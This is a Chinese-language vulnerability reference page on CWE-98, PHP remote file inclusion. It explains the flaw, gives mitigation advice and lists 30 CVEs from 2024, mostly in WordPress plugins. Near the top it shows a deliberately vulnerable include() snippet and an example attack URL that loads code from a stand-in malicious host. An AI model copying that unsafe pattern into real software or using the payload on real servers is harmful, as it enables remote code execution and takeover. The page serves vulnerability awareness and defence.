CWE-98 PHP程序中Include/Require语句包含文件控制不恰当(PHP远程文件包含) 类弱点 1198 条 CVE 漏洞汇总,含 AI 中文分析。
CWE-98是PHP远程文件包含漏洞,源于程序未严格限制包含语句中的文件名输入。攻击者常通过构造恶意URL,诱导服务器加载并执行远程恶意代码,从而获取系统控制权。开发者应避免直接使用用户输入作为包含路径,需实施严格的白名单校验,禁用远程文件包含功能,并确保输入经过充分净化,以阻断此类攻击路径。
$dir = $_GET['module_name']; include($dir . "/function.php");victim.php?module_name=http://malicious.example.com| CVE ID | 标题 | CVSS | 风险等级 | Published |
|---|---|---|---|---|
| CVE-2024-4551 | WordPress plugin Video Gallery 安全漏洞 — Video Gallery – YouTube Playlist, Channel Gallery by YotuWP | 6.4 | Medium | 2024-06-15 |
| CVE-2024-4258 | WordPress plugin Video Gallery 安全漏洞 — Video Gallery – YouTube Playlist, Channel Gallery by YotuWP | 9.8 | Critical | 2024-06-15 |
| CVE-2024-3813 | WordPress plugin tagDiv Composer 安全漏洞 — tagDiv Composer | 8.8 | High | 2024-06-15 |
| CVE-2024-5577 | WordPress plugin Where I Was, Where I Will Be 安全漏洞 — Where I Was, Where I Will Be | 9.8 | Critical | 2024-06-14 |
| CVE-2024-4936 | WordPress plugin Canto 安全漏洞 — Canto | 9.8 | Critical | 2024-06-14 |
| CVE-2024-36415 | SuiteCRM 安全漏洞 — SuiteCRM | 9.1 | Critical | 2024-06-10 |
| CVE-2024-35650 | WordPress plugin MelaPress Login Security 安全漏洞 — MelaPress Login Security | 4.9 | Medium | 2024-06-10 |
| CVE-2024-4887 | WordPress plugin Qi Addons For Elementor 安全漏洞 — Qi Addons For Elementor | 7.5 | High | 2024-06-07 |
| CVE-2024-35629 | WordPress plugin Easy Digital Downloads – Recent Purchases 安全漏洞 — Easy Digital Downloads – Recent Purchases | 9.6 | Critical | 2024-06-04 |
| CVE-2024-5348 | WordPress plugin Elements For Elementor 安全漏洞 — Elements For Elementor | 8.8 | High | 2024-06-01 |
| CVE-2024-3564 | WordPress plugin Content Blocks 安全漏洞 — Content Blocks (Custom Post Widget) | 8.8 | High | 2024-06-01 |
| CVE-2024-5345 | WordPress plugin Responsive Owl Carousel for Elementor 安全漏洞 — Responsive Owl Carousel for Elementor | 8.8 | High | 2024-05-31 |
| CVE-2024-3812 | WordPress Plugin Salient Core 安全漏洞 — Salient Core | 7.5 | High | 2024-05-18 |
| CVE-2024-3810 | WordPress Plugin Salient Shortcodes 安全漏洞 — Salient Shortcodes | 8.8 | High | 2024-05-18 |
| CVE-2024-32523 | WordPress plugin Mailster 安全漏洞 — Mailster | 8.1 | High | 2024-05-17 |
| CVE-2024-27971 | WordPress plugin Premmerce Permalink Manager for WooCommerce 安全漏洞 — Premmerce Permalink Manager for WooCommerce | 8.3 | High | 2024-05-17 |
| CVE-2024-3551 | WordPress Plugin Penci Soledad Data Migrator 安全漏洞 — Penci Soledad Data Migrator | 9.8 | Critical | 2024-05-17 |
| CVE-2024-4670 | WordPress plugin All-in-One Video Gallery 安全漏洞 — All-in-One Video Gallery | 8.8 | High | 2024-05-15 |
| CVE-2024-31459 | Cacti 安全漏洞 — cacti | 8.1 | High | 2024-05-13 |
| CVE-2024-3808 | WordPress Theme Porto 安全漏洞 — Porto Theme - Functionality | 8.8 | High | 2024-05-09 |
| CVE-2024-3809 | WordPress Theme Porto 安全漏洞 — Porto Theme - Functionality | 8.8 | High | 2024-05-09 |
| CVE-2024-3806 | WordPress theme Porto 安全漏洞 — Porto | 9.8 | Critical | 2024-05-09 |
| CVE-2024-4441 | WordPress plugin XML Sitemap & Google News 安全漏洞 — XML Sitemap & Google News | 8.1 | High | 2024-05-09 |
| CVE-2024-3807 | WordPress theme Porto 安全漏洞 — Porto | 8.8 | High | 2024-05-09 |
| CVE-2024-3849 | WordPress plugin HoliThemes 安全漏洞 — Click to Chat – HoliThemes | 8.8 | High | 2024-05-02 |
| CVE-2024-3500 | WordPress Plugin ElementsKit Pro 安全漏洞 — ElementsKit Pro | 8.8 | High | 2024-05-02 |
| CVE-2024-3499 | WordPress plugin ElementsKit Elementor addons 安全漏洞 — ElementsKit Elementor Addons – Advanced Widgets & Templates Addons for Elementor | 8.8 | High | 2024-05-02 |
| CVE-2024-1600 | lollms-webui 安全漏洞 — parisneo/lollms-webui | 7.5AI | HighAI | 2024-04-10 |
| CVE-2024-3136 | WordPress Plugin MasterStudy LMS 安全漏洞 — MasterStudy LMS WordPress Plugin – for Online Courses and Education | 9.8 | Critical | 2024-04-09 |
| CVE-2024-2047 | WordPress Plugin ElementsKit Elementor addons 安全漏洞 — ElementsKit Elementor Addons – Advanced Widgets & Templates Addons for Elementor | 8.8 | High | 2024-03-30 |
CWE-98(PHP程序中Include/Require语句包含文件控制不恰当(PHP远程文件包含)) 是常见的弱点类别,本平台收录该类弱点关联的 1198 条 CVE 漏洞。